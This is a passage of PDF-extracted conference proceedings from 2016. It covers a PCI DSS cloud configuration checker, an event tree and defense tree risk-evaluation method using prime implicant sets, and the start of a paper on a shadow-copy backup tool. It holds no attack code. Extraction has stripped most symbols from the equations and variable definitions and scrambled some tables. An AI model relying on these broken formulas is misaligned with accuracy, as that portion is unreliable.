purpose, we developed the KV for checking the
web system security beforehand to verify
whether security functions are set on the system
configuration based on PCI DSS in the design
stage. In the web system design stage, by
inputting the system configuration model
shown in Table 2 into the KV, the inputted
system configuration model is collated with the
PCI DSS security functions. The inputted
system configuration is used to block access
from the outside network to the DB server in
the inside network. Then, the web server issues
a pass or fail on whether security functions of
PCI DSS are satisfied, such as the disposition
of the web server in the DMZ. Based on the
PCI DSS, the KV verifies the security by
picking up points considered to be problems.
By inputting the present system configuration
of the cloud system, KV can verify the security
evaluation of the cloud system in operation, too.
The scope of the KV corresponds to Sections 1
and 2 for PCI DSS ver. 2.0 and the FW. (Ver.
2.0 was the latest version at the time of our
study.)
(b) Analysis of system configuration
Our system analyzes the system configuration
and inputs the analysis results into the KV.
Therefore, our system reads the machine
configuration
based
on
the
system
configuration model from each virtual machine
agent. Then it combines these obtained data and

ISBN: 978-1-941968-37-6 2016 SDIWC

outputs them in XML format. Each machine


configuration is read from the setting file, as
shown in Table 3.
Table 3 Machine configurations to read
Tag name
Detail of data
Web server Port number that Apache uses /
Port number that Virtual Host
uses
SSH
Port number that SSH uses
Database
Port number that DB uses
Filter
Rule of packet filtering
NAT
Rule of packet transfer
Interface
IPv4 address / Subnet mask /
MAC address
Bridge
Gateway address / IPv4 address
that relates with gateway
The files made by each machine are collected
with the OSSEC log and combined with the
system configuration model. Then, the
combined data are inputted to the KV as shown
in Table 2. The connections among virtual
machines are made to connect the bridge tags to
each other with the same gateway address. In
addition, the network zone is distinguished as
the DMZ or the inside network from the
network address translation (NAT) tag transfer
root, on the assumption that the zone having the
gateway address in the top level of a bridge tag
is the outside network.
The MG is the tool that inputs the data based on
the KV to make the above system configuration
model.
4.3 Verification of the functions
We verify whether the issues defined in 2.3 are
resolved by using the functions installed as
shown in 4.2. For this purpose, we change the
port used by MySQL in the DB server, as
constructed in 4.1, and we change the machine
configuration. As the results, we verify the
functions to detect this change and to evaluate
the security of the current system configuration

42

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

automatically. We obtain the following results


shown in Figures 3 and 4.

Figure 3 Result of the security evaluation


(Japanese description)

created is an input format for the KV, the MG


can make a more detailed system configuration
model by adding a variety of data for analysis
because the MG can read the machine
configuration from inside the machine.
Therefore, we will consider applying our
system to security standards other than the PCI
DSS, and to work with other standards as new
evaluation items for the security evaluation.
5.2 Tracking of system configuration
changes on a large scale

Figure 4 Screen of GUI (excerpt)


In Figure 3, the result says web server ID 1001
cannot gain access to the DB in the DB server.
The filtering setting of iptables in the DB server
does not change and some ports that do not use
this setting are blocked. Therefore, even though
the machine configuration changes, the packets
to the port using MySQL are blocked, and the
web server does not allow access to the DB
server. For this reason, we can show that the
route from the web server to the DB server is
detected as the problem, as shown at the upper
right in Figure 4.
5 DISCUSSION
5.1 Verification by the multi-layer
The MG makes the system configuration model,
and we can evaluate the suitable requirements
of the PCI DSS without depending on the
system operators knowledge. Though the
system configuration model that the MG has

ISBN: 978-1-941968-37-6 2016 SDIWC

In this paper, we can track changes in the model


of the web system with three virtual machines.
The cloud infrastructure can build large-scale
IT systems consisting of thousands of virtual
machines. In such environments, we can use the
same process to analyze logs in the virtual
machines and to read the hardware settings.
Therefore, if the performance in the
managements server is able to handle the load
for analyzing the log for changes of the system
configuration corresponding to the numbers of
the virtual machines, we deem our system to be
able to track the configuration changes in the
large-scale cloud system.
5.3 Calculation needed for security
evaluation
In the future, we will consider our application
in the large-scale environment. Therefore, we
discuss the acceptable execution time required
for a security evaluation when creating the
system configuration model and increasing the
number of virtual machines. We use the
environment for up to 100 virtual machines, all
of which have the functions of the web service,
DB, SSH, and FW corresponding to those in
this paper. We measure the execution time
when the number of virtual machines is
increased up to 100. We show the experimental
result in the environment equipped with a twocore, four-thread CPU and 4 GB memory in
Figure 5.

43

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

configuration is changed not only by the system


operator but by attacks not related to the system
operator. By detecting the system configuration
changes, the system operator can detect the
system configuration changes not only by his or
her operation but by attacks to the cloud.
6 CONCLUSION

Figure 5 Execution time vs number of virtual


machine
The curve of the execution time is represented
by using the Microsoft Excel function that
calculates the approximate curve. By
extrapolating the curve for an increasing
number of virtual machines, we find that 200
machines take about 7 minutes and 300
machines about 20 minutes. Therefore, we can
evaluate the security for up to 200 virtual
machines. Moreover, the calculation amount for
the security evaluation is O(N5/2) if the number
of machines is N. This is because the
combinations of communication routes for
analysis increase according to the powers of the
number of virtual machines as the number of
the virtual machine increase. It is necessary to
omit waste in analyses, such as evaluations at
certain points of changes of the system
configuration and evaluations only for the
differences after the changes of the
configuration in order to apply our system to an
environment with several thousand large-scale
virtual machines.
5.4 Added value obtained from an
automated security evaluation
The System Design Checker can automatically
make an evaluation based on the system
configuration. Therefore, maintaining security
functions after changing the system
configuration can take measures that do not
receive any attacks while changing the clouds
scale. On the other hand, the system

ISBN: 978-1-941968-37-6 2016 SDIWC

We developed a real-time security evaluation


system named the System Design Checker to
evaluate and score a cloud system based on
security standards in real time at the design
stage as well as at the operation stage. To
satisfy the requirements for security functions,
we developed automatic evaluation by creating
a system configuration model for the network
and the machine configurations. In addition, by
analyzing the logs in virtual machines for
monitoring the machine configuration and by
analyzing the hardware for the network
configuration comprising the cloud system, this
system can trace system configuration changes
and can respond to the changes.
To evaluate security, it is possible to analyze
the conventional systems such as FireMon
[17]. However, conventional evaluation
methods cannot analyze the communication
between packet applications. The System
Design Checker system can model each
application setting to set an agent in each
virtual machine, and then we can analyze the
network even between complicated applications
that are made from virtual machines to
construct the cloud system. The number of
applications is increasing, but we can find
problems of each virtual machine at the edge of
router.
In conclusion, our system needs less human
power to operate and maintain cloud security.
In the future, we will increase the system
operation speed and add new security
evaluation points. We also need to test and
evaluate this system in more specific situations.

44

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

REFERENCES
[1]

NIST (National Center of Incident readiness and Strategy for


Cybersecurity), General technical standard for security measures
of the government,

http://www.nisc.go.jp/active/general/pdf/k305111.pdf
[2]

Y. Ashino, Y. Takahashi, Y. Morita, S. Shima, T. Okamura, Y.


Teshigawara, R. Sasaki, Development of IT system Design
Support Tool Based on Security Standards, CSS (Computer
Security Symposium), Vol. 4, pp. 478-485, 2013.

[3]

M. Sekine, Y. Ashino, S. Shima, Y. Teshigawara, R. Sasaki,


Development and evaluation of a adynamic evaluation method
for cloud system security during operation, Research report
computer security (CSEC), Vol. 2016-CSEC-72, No. 30, pp.1-8,
2016.

[4]

R. Shaikh, M. Sasikumar, Trust Model for


Measuring Security Strength of Cloud Computing
Service, International Conference on Advanced
Computing Technologies and Applications, Vol. 45,
pp. 380-389, 2015

[5]

J.Che, Y. Duan, T. Zhang, J. Fan, Study on the


Security Models and Strategies of Cloud
Computing, Procedia Engineering, Vol. 23, pp.
586-593, 2011

[6]

AWS (Amazon Web Service), Amazon Inspector,


https://aws.amazon.com/inspector/

[7]

A. Ambre, N. Shekokar, Insider Threat Detection Using Log


Analysis and Event Correlation, International Conference on
Advanced Computing Technologies and Applications, Vol. 45, pp.
436-445, 2015

[8]

Y. Watanabe, M. Mizutani, N. Uramoto, Event Monitoring and


Analytics for Compliance Automation on IaaS Public Cloud, Vol.
2015-DPS-162, No. 32, pp. 1-6, 2015

[9]

O. Sderstrm, E. Moradian, Secure Audit Log


Management, 17th International Conference in
knowledge Based and Intelligent Information and
Engineering Systems, Vol. 22, pp. 1249-1258, 2013

[10]

NTT Data, Obout Hinemos,


http://www.hinemos.info/hinemos

[11]

SCSK,
Obout
ArcSight
ESM,
https://www.scsk.jp/sp/sys/products/arcsight/

[12]

DMTF (Distributed Management Task Force),


Common
Information
Model,
http://www.dmtf.org/standards/cim

[13]

Microsoft, Hyper-V WMI provider v2,


https://msdn.microsoft.com/enus/library/hh850319(v=vs.85).aspx

[14]

Security Standards Council, PCI SSC Data Security


Standards
Overview,
https://www.pcisecuritystandards.org/security_stand
ards/index.php

ISBN: 978-1-941968-37-6 2016 SDIWC

[15]

@IT Special, reason that Hyper-V was Number


One
in
Japan,
http://www.atmarkit.co.jp/ait/articles/1303/14/news0
04.html

[16]

OSSEC Team, About OSSEC,


http://www.ossec.net/?page_id=4

[17]

Fujitsu Social Science Laboratories, About


FireMon,http://www.fujitsu.com/jp/group/ssl/produ
cts/network/security/networksecurity/netproducts/firemon/

45

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Proposal of an Improved Event Tree and Defense Tree


Combined Method for Risk Evaluation with Common Events
Ryo Aihara, Ryohei Ishii and Ryoichi Sasaki
Tokyo Denki University
Senjuasahi-cho 5, Adachi-ku, Tokyo-to, 120-8551 JAPAN
[email protected], [email protected]

ABSTRACT
Damage caused by targeted attacks has
increased in recent years. In order to cope with
the issue, we previously developed the event
tree and defense tree combined (EDC) method
for obtaining the optimal combination of
countermeasures against targeted attacks based
on security analyses. However, the original
EDC method cannot deal with common events,
i.e., events that are the common cause of more
than one type of problem, here and in the main
text. In order to deal with common events,
instead of minimal cut set (MCS) operation, we
introduce the prime implicant set (PIS)
operation, which can obtain cut sets, including
negative events, for the sequence of the event
tree. The results of a numerical experiment
confirm that the occurrence probability can be
calculated correctly by introducing the PIS.
Moreover, if PIS operation is not implemented,
the overall risk may be underestimated by a
factor of three.
KEYWORDS
APT, Targeted attack, Risk assessment, Defense
tree, Attack tree.

1 Introduction
Proper quantitative risk analysis is essential in
order to employ proper countermeasures
against ever-increasing cyber-attacks. A
number of revised methods based on attack tree
analysis [1], developed by Bruce Schneier, have
been proposed. Bistarelli et al. [2] proposed a
defense tree in order to determine possible
countermeasures.

ISBN: 978-1-941968-37-6 2016 SDIWC

However, it is difficult to apply these methods


to attacks, such as targeted attacks, that are
composed of a variety of attack events that
occur over time.
In recent years, the damage caused by targeted
attacks has been on the rise [3]. Therefore, we
developed the event tree and defense tree
combined (EDC) method [4]. The EDC
method, which consists of an event tree analysis
method and the defense tree analysis method,
can also obtain the optimal combination of
countermeasures against targeted attacks based
on a security analysis.
Although there already exists a similar risk
analysis method which incorporates event tree
analysis and fault tree analysis and is used for
the safety assessment of nuclear power
plants,[5] this method cannot determine
appropriate countermeasures.
By applying the EDC method to a targeted
attack on a small company, we confirm that the
EDC method is useful for obtaining the optimal
combination of countermeasures against
targeted attacks. However, the original EDC
method did not consider common events, which
are events that cause more than one problem at
the same time. In general, if a common event is
not taken into consideration, the risk will be
underestimated or overestimated.
In the original EDC method, the following two
common events can be considered:
(1) The impact of a countermeasure on
multiple attacks.
(2) Events that are the common cause of more
than one type of problem.
For common event (1), if the correct
countermeasure is applied to the attacks, it is

46

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

possible to correctly estimate the risk reduction


effect by the conventional method of
calculation. For common event (2), improved
calculation methods are expected to be
required.
In the present paper, we investigate a method
of addressing the problems related to common
event (2). In the field of reliability engineering,
this type of common event is referred to as a
common mode failure. In this field, after
expressing the relationship of vents by a fault
tree, the common mode failure in the fault tree
problem is usually solved using a minimal cut
set (MCS) calculation [6].
However, for the case of using a combination
of event tree analysis and defense tree analysis,
because of the requirement to include a
negative event, it is impossible to solve a
common event problem using an MCS, as
described in detail in Section 3.2. Therefore, we
decided to use the method of deriving the prime
implicant set (PIS) that can be applied to
negative events [7].
Although the number of studies dealing with
the security evaluation is increasing [8][9],
there are no studies that take into account a
common event in the security evaluation. There
are also no studies that have used the PIS for
assessment in conjunction with the proposed
countermeasures, in the field of security
evaluation or any other field.
In the present paper, we present a calculation
method that takes into account a common event
by deriving the PIS for the EDC method. After
we propose this method, which enables
common event operation using the EDC
method, the effect of considering a common
event used in the EDC method is demonstrated
through a numerical experiment.

analyzing targeted attacks consisting of a


variety of attack events that occur over time.
The original EDC method is implemented as
follows.
Step 1 Determine the target for evaluation
The target for evaluation is determined. As an
example, a small WEB service company is
considered as a target.
Step 2 Analyze the target
The target is analyzed for formulation. For
example, the number of servers and PCs of the
company are estimated for use in the
evaluation. Moreover, a targeted attack similar
to the attack on the Japan Pension Service was
assumed in this case.
Step 3 Decide the objective function and the
constraints function.
In the sample case, the total cost, which is the
overall risk and the cost to implement the
countermeasures, was selected as the objective
function. The cost to implement the
countermeasures was selected as the constraint.
Step 4 Propose alternative countermeasures
The countermeasures, for example, education
on how to handle suspicious emails or the
introduction of a sandbox, are proposed in order
to determine the overall risk.
Step 5 Formulate a combinatorial optimization
problem
The objective function and constraint function
can be expressed by the following numerical
formula, which includes zero-one variables:

2 Original EDC method


2.1 Overview of the original EDC method
The original EDC method includes a function
to obtain the optimal combination of
countermeasures. The combination of event tree
analysis and defense tree analysis is used in the
original EDC method, which is suitable for

where represents the zero-one variable. If the


i-th countermeasure is adopted, = 1,
otherwise = 0. Here, represents the cost of
the i-th countermeasure, is the constraint on
the total cost, and is the function to calculate
the overall risk using event tree analysis and

ISBN: 978-1-941968-37-6 2016 SDIWC

(1 , 2 , 3 , , ) +

(1)

=1

subject to

(2)

=1

47

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

defense tree analysis, as described in some


detail in Sections 2.2 and 2.3.
Step 6 Obtain the optimal combination of the
proposed countermeasures
By using a combinatorial optimization
program, the optimal combination of the
proposed countermeasures is obtained.
2.2 Event tree analysis
Event tree analysis is a probabilistic risk
analysis technique. In event tree analysis, after
an undesirable event, which is referred to as the
initiating event, has occurred, the sequence of
events that follows is expressed as a tree, as
illustrated in Fig. 1.
In this case, Events 1 and 2 are the heading
items. For each heading item, the tree is
branched into success and failure branches from
the viewpoint of the attackers. Here, sequence 1
indicates that, even though a targeted mail
containing malware was sent to the institute, no
PCs at the institute were infected. Sequence 2
indicates that, even though a PC was infected,
the attacker failed to obtain information from
the institute. In contrast, sequence 3 indicates
that, after a PC was infected, the attacker
obtained information from the institute.
Next, in the event tree analysis, the success
probability for heading item is calculated
using defense tree analysis. The failure
probability for heading item i can then be
obtained as (1 ).
The probability of the sequence can be
obtained by multiplying the probability of the
initiating event and the occurrence probability
of the heading items. For example, in the case
of Fig. 1, the probability of sequence 1, 2, and
3, which are represented as 1 , 2 , and 3 can
be obtained as follows:
1 = (0 (1 1 ))
2 = (0 1 (1 2 ))
3 = (0 1 2 )

ISBN: 978-1-941968-37-6 2016 SDIWC

(3)

The risk value of sequence k can be calculated


by multiplying the probability of sequence k
and the magnitude of the impact due to the
occurrence the sequence k, as follows:
=

(4)

The overall risk is defined as the summation of


the risks of all sequences, as below:

R =

(5)

=1

The overall risk R is used as an index to


reduce the risk.
Here, the success probability P for heading
item is estimated using defense tree analysis
of the present situation and the situation after
countermeasure was implemented.

Figure 1. Example of an event tree

2.3 Defense tree analysis


In the present paper, the defense tree consists
of an attack component and a defense
component, as illustrated in Fig. 2. The attack
component is expressed by the upper part of the
defense tree. The top event of the defense tree
represents the success of the attack related to
each heading item of the event tree. Therefore,
the probability of the top event of the defense
tree is equal to P , which represents the success

48

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

probability of the j-th heading item. The causes


of the success are represented using AND/OR
gates as shown in Fig. 2. The expansion to the
lower direction using AND/OR gates is
continued until reaching the level at which the
countermeasure is prepared.

P = (, )
= 1 (1 P P ) (1 P P )
= 1 (1 0.7 0.2) (1 0.7 0.4)
= 0.38
(6)
Next, we explain the method used to calculate
the top event probability after carrying out
measure to the lowest event for example .
First, the probability of event when the i-th
countermeasure was carried out can be
calculated as follows:

= {(1 ) + }

(7)

=1

Figure 2. Example of a defense tree

The defense component of the defense tree is


represented by box indicating a considerable
countermeasure under the lowest event of the
attack component, as shown in Fig. 2. Multiple
countermeasures can be prepared for one of the
lowest events on the attack tree.
The probability of the top event of the defense
tree before carrying out countermeasures is
calculated as follows.
Here, we define as the event Data
retrieval, as shown in Fig. 2.
We also define b as the event Success of
communication that does not pass through a
proxy, and c as the event Slip the C & C
servers blacklist.
In the present paper, "xORy" is represented as
the ", ", and "xANDy" is represented as "".
Then, the top event can be represented as
", " from the structure of the defense tree.
If P , which indicates that the probability of a,
is 0.7, P = 0.2 , and P = 0.4 , then the
probability of the top event can be calculated as
follows:

ISBN: 978-1-941968-37-6 2016 SDIWC

where are zero-one variables. If the i-th


countermeasure for event a is adopted, = 1,
else = 0 . Moreover, is the number of
countermeasures, and represents the
decrease effect when the i-th countermeasure
for event was adopted.
In the case of Fig. 2, = 1 and 1 = 0.5.
Then, if the countermeasure is adopted, the
value of is equal to 0.35. Therefore, the
probability of the top event is
P = ( , )
= 1 (1 P ) (1 P )
= 1 (1 0.35 0.2) (1 0.35 0.4)
= 0.20
(8)
As a result, Step 5 can be described as follow.
Step 5-1 Obtain the cut set of the attack
component of each defense tree. In the case of
Fig. 4, the cut set is a,b and ac.
Step 5-2 Obtain the formulation to obtain the
success
probability
considering
countermeasures for each sequence (See
Equations (7) and (8)).
Step 5-3 Obtain a formulation to calculate the
probability
considering
alternative
countermeasures for each sequence (see
Equation (3)).

49

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Step 5-4 Obtain a formulation, such as


Equation (4), to calculate the risk for each
sequence.
Step 5-5 Obtain a formulation to calculate the
overall risk (See Equation (5)).
2.4 Application of the original EDC
The original EDC was applied to a small WEB
service company [4]. In this case, the number of
heading items of the event tree was eight. The
number of alternative countermeasures was 12.
When the value of c = 2yen or 3 yen, the
optimal combination of countermeasures was
obtained.
The application confirmed that the EDC
method is useful for obtaining the optimal
combination of countermeasures against
targeted attacks.
3 Proposed method
3.1 Common events
When multiple events occur at the same time
due to a single causal event, the causal event is
referred to as the common event.
First, we explain the common event using a
fault tree.
In Fig. 3, the common event is expressed as
Power outage. If a power outage occurs, the
event Room darkens immediately, although
the event Power outage is described in two
parts in Fig. 3.
If such common events are not considered, it
will be impossible to obtain an accurate
probability.
A common event is referred to as a common
mode failure in the field of reliability
engineering.
We can obtain the correct probability in
deriving the MCS for this problem.

Figure 3. Examples of common mode failure in a fault


tree

3.2 MCS operation


The MCS is a set of minimum combinations
that guarantee the occurrence of the top event in
the fault tree. The MCS can be derived using
the absorption rule and the idempotent rule in
Boolean operation [10].
In Fig 3, the cut set of the top event
represented as , , , for the case in
which no common events are considered. Using
the absorption rule and the idempotent rule of
Boolean operations, it is possible to derive the
MCS for the top event of this fault tree as
follows:
, , ,
= , , , (because is transformed into
a according to the idempotent rule)
= , (because , , and are transformed
into a according to the absorption rule)
(9)
The probability of the top event without
considering the common event is calculated as
follows:
(, , , )
= 1 (1 ) (1 )
(1 ) (1 )
(1
= 1 0.04) (1 0.04) (1 0.04)
(1 0.04)
= 1 0.96 0.96 0.96 0.96
= 0.38
(10)
When we consider a common event and MCS
operation is used, the probability of the top
event is calculated as follows:

ISBN: 978-1-941968-37-6 2016 SDIWC

50

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

(, ) = 1 (1 ) (1 )
= 1 (1 0.2) (1 0.04)
= 1 0.8 0.96
= 0.23
(11)
From Equations (10) and (11), we can
determine that the probability in the case of
deriving the MCS becomes approximately 1.5
times larger than that without MCS operation.
As shown here, if we do not consider the
common event, the risk can be easily
underestimated. It is easy to also use MCS
operation in the defense tree. However, in the
EDC method, event tree analysis and the
defense tree are used in combination.
The event tree illustrated in Fig. 1 has two
heading items. Let defense trees related to
heading items 1 and 2 be expressed as shown in
Fig. 4. Here, the extended defense tree, which
represents sequence 3, is shown in Fig. 5. This
extended defense tree is similar to the original
defense tree, and it is possible to use MCS
operation.
On the other hand, the extended defense tree,
which represents sequences 1 and 2, is shown
in Fig. 5. This extended defense tree includes a
negative event. It is impossible to apply MCS
operation to this type of tree. Therefore, instead
of MCS operation, we use PIS operation, which
is an extension of MCS operation, and was
studied in Boolean operations (See Table 1).

Figure 5. Sequences 1 through 3 expressed by the


extended defense tree

3.3 PIS operation


The PIS for the extended defense tree for
sequence 2 can be obtained as follows.
Here, the cut set of event 1 is , , and that of
event 2 is :
) = , (
(1)(2
) = (, )
= , , , ( in the formula is made
null according to the complementation rule of
PIS operation)
=, ,
(12)
The complementation rule means that it is
impossible for the event to both exist and not
exist at the same time.
The complementation rule is included in PIS
operation but is not included in the MCS.
The absorption rule and the idempotent rule
are also included in PIS operation.
Here, the probability of the top event of the
extended defense tree shown in Fig. 5 can be
calculated as follows:
(, , )
= 1 (1 ) (1 )
(1 )
= 1 (1 0.84) (1 0.84) (1 0.84)
= 0.23
(13)

Figure 4. Example of a defense tree

ISBN: 978-1-941968-37-6 2016 SDIWC

3.4 Method of applying the improved EDC


method
The flow for applying original EDC method
was described in Section 2.1. The EDC is
improved in Step 5 Formulate a combinatorial
optimization problem. The improvement is to
add a function for dealing with a common

51

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

event. The procedure for calculating the overall


risk is as follows:
Step 5-1 Obtain the cut set of the attack
component of each defense tree. (See Fig. 4.)
Step 5-2 Obtain the PIS for each sequence.
For sequence 1

= (,
1
) =

(14)

For sequence 2
) = (, )(
(1)(2
)
= (, )(, )

(15)

For sequence 3
(1)(2) = (, )()
= (, )
= ()

(16)

Step 5-3 Obtain a formulation to calculate the


probability
considering
alternative
countermeasures using the PIS and zero-one
variables for each sequence.
0
1 = 0 1 = 0

(17)

2
2 = 0 1
= 0 (1 (1 )(1 ))( )
0 (1 (1 )(1 ))
(by
introducing a countermeasure as zero-one
variables, when one countermeasure is applied
to events and , respectively.)
= 0 (1
(1 ( ((1 1 ) + 1 1 )))
(1 ( ((1 1 ) + 1 1 )))) (18)
where 1 represents zero-one variables. If the
first countermeasure for event is adopted,
then 1 = 1, otherwise 1 = 0.
Here, 1 represents zero-one variables. If the
first countermeasure for event b is adopted,
then 1 = 1, otherwise 1 = 0.
Here, 1 represents the reduction rate when
countermeasure first for event , and 1
represents
the
reduction
rate
when
countermeasure first for event .

ISBN: 978-1-941968-37-6 2016 SDIWC

(by
3 = 0 1 2 = 0
introducing a countermeasure as zero-one
variables when one countermeasure is adopted
for events and c, respectively)
= 0 ((1 1 ) + 1 1 )
((1 1 ) + 1 1 ) (19)
where 1 represents zero-one variables. If the
first countermeasure for event is adopted,
then 1 = 1, otherwise 1 = 0.
Here, 1 represents the reduction rate when
the first countermeasure is adopted for event .
In Fig. 4, = 0.2, = 0.2, = 0.2 1 =
0.8, 1 = 0.8, and 1 = 0.8.
Step 5-4 Obtain a formulation such as
Equation (4) to calculate the risk for each
sequence.
Step 5-5 Obtain a formulation such as
Equation (5) to calculate the overall risk.
Table 1. Rules used in PIS operation

Rule
Idempotent rule
Absorption rule
Complementation rule

Example
aa => a
(a, ab) => a
(a, a) => Null

4 Experimental risk evaluation


Table 2 shows the results of the calculated
overall risk considering a common event using
PIS operation and without considering a
common event. Here, M1, which represents the
impact of sequence 1 of the event tree
illustrated in Fig. 1 is set to 101. In the same
manner, M2 is set to 102, and M3 is set to 103.
In addition, the probability of each lowest event
of the defense tree is set to 0.2, and the
reduction rate due to the countermeasures is set
to 0.8 in order to clarify the effect of taking a
common event into account.
The results indicate that the overall risk may
be underestimated by a factor of three if we did
not use PIS operation.

52

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Table 2. Probability and risk for each sequence

1
2
3
total

Proposed method
Previous study
probability risk probability
risk
0.64 6.40
0.64
6.40
0.41 41.0
0.35
35.0
0.04 400
0.01
100
447
141

Table 3 shows the overall risk when the same


countermeasure is applied to each of the lowest
events in the defense tree. Here, is a common
event, and b and are not common events.
From Table 3, we can determine that the overall
risk can be reduced to the greatest degree when
the countermeasure was applied to the common
event.
Table 3. Probability of the occurrence of each
sequence due to the use of a different countermeasure

1
2
3
tot
al

Countermea Countermea Countermea


sure applied sure applied sure applied
to event a
to event b
to event c
prob risk prob risk
prob risk
abilit
abili
abili
y
ty
ty
0.67
6.7 0.67
6.7 0.64
6.4
0.39 39.0 0.36 36.0 0.42 42.0
0.03 300 0.04
400 0.03
300
345
442
348

5 Conclusion
In the present paper, we proposed a method
that enables common event operation with the
original EDC method. Here, the EDC method,
which incorporates event tree analysis and
defense tree analysis, is used to obtain the
optimal combination of countermeasures
against targeted attacks.
In order to enable common mode operation,
instead of MCS operation, we introduce PIS
operation, which can obtain a cut set including
negative events for the sequence of the event
tree.
The results of the numerical experiment
confirmed that we can calculate occurrence
probability correctly by introducing the PIS.
Moreover, if we did not use PIS operation, the

ISBN: 978-1-941968-37-6 2016 SDIWC

overall risk may be underestimated by a factor


of three. Furthermore, if two countermeasures
have the same reduction rate and occurrence
probability, applying a countermeasure to a
common event is more effective than applying
it to a non-common event.
In order to use the EDC method more
effectively, we intend to develop a support
program for the revised EDC method.
Moreover, the EDC method and the support
program will be applied to a number of targets.
REFERENCES
[1]
[2]

[3]

[4]

[5]
[6]
[7]

[8]

[9]

[10]

B. Schneier, Attack trees, Dr. Dobbs journal,


vol.24, pp. 21-29 (1999).
S. Bistarelli, F. Fioravanti, and P. Peretti, Defense
trees for economic evaluation of security
investments, in Availability, Reliability and
Security. ARES 2006. The First International
Conference on, p. 8 pp(2006).
Symantec : 2013 ISTR Shows Changing
Cybercriminal
Tactics

http://www.symantec.com/connect/blogs/2013-istrshows-changing-cybercriminal-tactics (references
2016-7-27)
R. Ishii, R. Sasaki Proposal of Risk Evaluation
Method using Event Tree and Defense Tree and Its
Trial Application to Targeted Attack, in Japan
Society of Security Management, p.8 pp(2015) (in
Japanese).
N. Yuhara and H. Ujita, System Safety Studies.
kaibundo publishing, (2015) (in Jpanese)
D. KececiogluReliability Engineering Handbook,
vol.2Prentice Hall222-231 (1991)
K. Takaragi, R. Sasaki, and S. Shingai An
Algorithm for Obtaining Simplified Prime Implicant
Sets in Fault-Tree and Event-Tree Analysis, IEEE
Transactions on Reliability, vol.R-32, pp.386390(1983).
K. Ingols, R. Lippmann, and K. Piwowarski,
Practical Attack Graph Generation for Network
Defense,
in
Annual
Computer
Security
Applications Conference, ACSAC 2006, pp.121130(2006).
A. Roy, D. S. Kim and K. S. Trivedi, Attack
countermeasure trees (ACT): towards unifying the
constructs of attack and defense trees, in Security
and Communication Networks, vol.5, pp. 929943(2012).
Fault Tree Handbook with Aerospace Applications

https://www.hq.nasa.gov/office/codeq/doctree/fthb.p
df

53

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Proposal of Unified Data Management and Recovery Tool Using Shadow Copy
Naoki Matsutaka and Masato Eguchi, Takuya Okazaki,
Takashi Matsumoto, Tetsutaro Uehara*, Ryoichi Sasaki
Tokyo Denki University
Senjuasahicho 5, Adachi-ku, Tokyo-to, 120-8551 JAPAN
*Ritsumeikan University
Tojiinkitamachi 56-1, kita-ku, Kyoto-fu, 603-8577 JAPAN
[email protected]

ABSTRACT
In recent years, solid state drives (SSD) have started
to replace hard disk drives. An SSD is a high-speed
storage device with a TRIM function. However, an
SSD cannot restore deleted files. Therefore, the user
is required to back up data for protection. The
Microsoft Volume Shadow Copy Service (VSS) is
often recommended for backups. However,
although it has tools for backup, they are
complicated to use. In addition, VSS does not have
enough implemented functions. Therefore, we
propose a unified tool named ShadowBox, which
easily helps typical users to create a shadow copy
and to restore data from it. In addition, we discuss
the protection of shadow copy data from attacks due
to malicious persons and ransomware.

KEYWORDS
Backup, Shadow Copy, SSD, Ransomware, Data
Protection

1 INTRODUCTION
In recent years, solid state drives (SSDs) have
begun to replace hard disk drives (HDDs). An
SSD, which is a solid-state semiconductor
storage device, can read data at high speed,
because it does not move a head on the medium.
This feature is different from the data reading
of a HDD. The usage percentage of SSDs will
continue to increase as their data capacity is
expanded and their performance is improved.
On the other hand, SSDs have problems such
their inability to recover data for digital

ISBN: 978-1-941968-37-6 2016 SDIWC

forensics, and erroneously erased data. An SSD


has a function named TRIM, which
automatically detects deleted data and creates
an empty block. The TRIM function can
increase the data writing speed. On the other
hand, TRIM has the disadvantage that a deleted
file cannot be recovered. The data on an HDD
or USB flash memory can be restored just after
deleting a file, because such devices do not
have a TRIM function. If TRIM is enabled, the
SSD recognizes the deleted data as unnecessary.
Moreover, the TRIM function completely
deletes the actual data. This makes digital
forensics difficult with an SSD. For the same
reason, when important files are deleted by
mistake, they cannot be recovered. As an
example, Yamamae et al. (2015) conducted an
experiment on restoring the erased files of a
SSD [1]. The results showed that the deleted
files could not be recovered even immediately
after deletion when TRIM was enabled. In
addition, most deleted data was lost after only
one day even if TRIM was not enabled.
Therefore, using an SSD requires backing up
data for protection, because recovery of data is
impossible.
The Microsoft Volume Shadow Copy Service
(VSS) has tools for creating shadow copies and
restoring files from these copies. However,
using these tools is not easy and they lack some
required functions. In addition, no tools capable
of protecting shadow copy data from attacks of
ransomware or the malicious behavior of
internal persons have been proposed.

54

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Therefore, we propose a unified tool named


ShadowBox that easily helps the typical user to
create shadow copies and to restore data from
them. In addition, this tool can protect shadow
copy data from attacks of ransomware or
malicious internal persons. ShadowBox is made
up of three applications: VSSManager,
VSSaver and VSSLogger. VSSManager is a
tool for easily backing up and restoring shadow
copy files. VSSaver and VSSLogger are used
cooperatively to protect the shadow copy area
and to log attacks against it. Among the three
application programs, only VSSManager has
actually been developed. The developed
